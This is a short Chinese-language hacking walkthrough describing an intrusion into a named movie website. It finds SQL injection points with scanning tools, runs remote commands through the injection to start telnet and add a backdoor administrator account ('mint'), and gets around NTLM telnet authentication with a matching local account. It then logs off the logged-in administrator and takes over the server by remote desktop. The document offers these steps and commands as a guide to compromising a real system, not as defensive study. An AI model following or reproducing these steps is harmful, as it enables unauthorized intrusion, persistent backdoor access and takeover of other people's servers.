操作过程
1，查找一个电影网站。
http://www.22see.com/

2，利用ascscan查找网页可以利用的注入点。

3，使用NB2注入工具进行注入

4，使用ping命令得到www.22see.com的ip地址

5，使用端口扫描器扫描ip开放的端口。发现开放
3389，对方管理员看来安全意识很差。使用终端服务却不修改默认3389端口。

6，使用nb2的sql工具。远程执行dos命令

net start telnet                                       开telnet服务

net user mint mint /add                                添加用户mint密码为mint

net localgroup administrators mint /add                将帐号mint升级为管理员

7，使用3389登陆。发现登陆用户已满。不用怕。我们把他踢出去。

8，telnet对方ip。发现需要NTLM 身份验证。怎么办？放弃不是黑客的追求。

9，我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

10，找到c:\winnt\system32\cmd.exe 建立一个快捷方式到桌面。

11，修改cmd的快捷方式属性为允许其他身份登陆。

12，然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint

13，telnet对方ip.直接可以登陆对方电脑了。
使用命令
c:\query user                  查看对方目前终端登陆状况。

运行命令
c:\logoff 1                     踢出去一个管理者

再用c:\query user检查一便~~
ok了

14，使用3389远程终端登陆。